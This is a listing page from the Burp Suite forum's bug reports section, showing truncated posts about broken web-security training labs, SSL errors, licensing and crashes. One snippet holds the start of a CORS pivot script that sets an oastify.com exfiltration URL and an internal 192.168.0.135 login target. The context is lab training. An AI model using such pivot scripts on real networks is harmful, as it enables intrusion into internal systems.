Bug Reports - Page 35 - Burp Suite User Forum

Burp Collaborator Default Servers Showing SSL Issue

Hi folks, When I (and other colleagues) run "Health Check" for Burp Collaborator on v2023.4.3 we are getting a significant amount of errors rendering Default Collaborator not functional. Is this a known issue affecting...

No category "Gifts" on website

The lab revolves around a SQL injection on the category "Gifts", but there is none. https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

Лабораторная работа: контрабанда HTTP-запросов, базовая TE.CL уязвимость

I tried to solve it myself several times, then your decision, and then as in the video. Nothing helps

No more activations allowed

Hi Team, I am trying to reactivate my Burp Pro license several times on my different machines due to environmental issues. I unable to reactivate as I am getting "No more activations allowed for this license" message....

Lab Bug

I am facing trouble with 'Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft' lab. Firstly, somehow lab asks me to 'Make the database retrieve the string: '8.0.32-0ubuntu0.20.04.2'' when...

Workaround for Java errors opening Burp on a secondary display on Linux

I encountered this and worked through it before I could blame Burp, so I want to post about it here for search-engine happiness. Using openjdk-17 on Linux with multiple monitors, Burp will start just fine on the first...

TE.CL smuggling labs - official solutions do not work

The following labs don't seem to work / work stably. https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header To reproduce...

Getting the below error message only when I connect through Burp proxy, happens for all sites

I HAVE generated the Burp certificate and loaded it in to the browser (Firefox, Burp and Chrome) - problem persists. Yelp! The 'peer' in this case would be the Burp Proxy listener. Thanks. Secure Connection...

Built in Chromium browser crashes after computer goes into sleep

On Windows 11 every time the computer goes into sleep mode the built in Chromium browser crashes. When opened again it shows a message that the browser was not closed properly and if I want to restore the session.

Has anyone else noticed the bundled Chrome browser hangs on recent releases ?

Running v2023.3.4 at the moment but noticed it started around v2023.x. This is on latest patched Windows 10 release. Seems to occur almost randomly however running DOM invader with prototype pollution with Scan for...

SSL Errors

Hi, it's me again. I've tried your solution to connect to the same website (the one of yves) but i still encounter SSL problems. I've installed also the certificate on my phone and it doesn't help. I've wrote also to your...

Lab: CORS vulnerability with internal network pivot attack

The LAB doesn't work, so I tried it myself, because we overestimate it, it doesn't work !! <script> bu_url = 'https://' + 'pf8ramweqox3mawt6h1l1w6v3m9ex3.oastify.com'; url = `http://192.168.0.135:8080/login`; ...

False Positives For Dependency confusion because of extra character...

To Whom it may concern, When opening a package-lock.json file in the browser with burp running, BurpSuite falsly identifies a HIGH Vulnerabilty know as Dependency Confusion every time... This is occuring because the "{"...

Everytime crashes the lab "Reflected XSS with some SVG markup allowed" when payloading it

Hello, I have an issue when I'm trying to do payloading to find XSS valid tags into "<>" tags. Everytime when I try to use Intruder to act the "Sniper" type of attack the server of this lab...

In app browser fails to launch (Burp 2023.3.5/Java 17/Kali Linux)

Clicking the open browser buttons in the proxy tab or target tab has no impact, nothing shows up in diagnostics. When using health check for burps browser, the Checking headless browser gives this error: Aborting checks...

Collaborator makes GET request to collaborator payload in User-Agent string

While testing a CRLF based header injection on an application I noticed that collaborator will make GET requests to any *.oastify.com hostname specified in the User-Agent header. For example, given the following...

Cache Poisoning Labs

I have been experiencing issues with the web cache poisoning labs the last couple days where the labs are not caching the HTTP responses at all. No matter how many times I resend the same basic requests (e.g. GET /), I...

Expert XXE challenge solvable in incorrect manner

Hello, While messing about with the "Expert" XXE Academy challenge ("Exploiting XXE to retrieve data by repurposing a local DTD"), I found that executing the same payload as the prior "Practitioner" challenge ("Exploiting...

Lab not working properly

I am doing the following lab https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-unkeyed-query But the response is not being cached, I have tried by sending a...

Burp suite is showing protocol error

when i tried using the lab for sqli the burp suite keep throwing me protocol error, i tried that by using firefox and the lab is working and didn't gave me an error. please resolve this issue.